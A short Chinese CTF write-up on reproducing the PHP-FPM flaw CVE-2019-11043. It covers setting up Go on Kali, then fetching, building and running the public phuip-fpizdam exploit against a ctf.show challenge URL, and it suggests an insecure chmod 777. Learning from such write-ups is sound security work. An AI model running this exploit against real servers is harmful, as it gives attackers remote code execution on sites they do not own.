首先确定是cve 2019-11043
从网上找资料来打,yu师傅的博客
https://blog.csdn.net/miuzzx/article/details/111409718?spm=1001.2014.3001.5501
还有https://paper.seebug.org/1063/
加上自己的遇到的一些问题
首先我们先安装go环境,文件太大你是拖不进去kali的,尝试使用xshell和xfpt
失败
从网上了解到,xshell无法直接连接kali 的 root权限 需要先改一下文件配置
参考这篇文章https://blog.csdn.net/qq_41877184/article/details/89737079
解决完以后从https://golang.google.cn/dl/ 下载go环境用xshell连接到kali
这个命令来解决
如果出现没有权限的情况,到go目录下打开终端尝试这个命令
sudo chmod -R 777 go/
之后go环境就装好了
下载github上公开的exp(需要go环境)
go get github.com/neex/phuip-fpizdam
可能会失败
尝试这个命令来解决
go env -w GOPROXY=https://goproxy.cn
然后编译
go install github.com/neex/phuip-fpizdam
使用exp攻击demo网站
./phuip-fpizdam http://697ad24e-bcff-4558-9795-0651afa73be8.challenge.ctf.show:8080/index.php
可能会多次失败,建议刷新页面多次请求
出现
总的来说这个复现不算太难。。。。我太菜了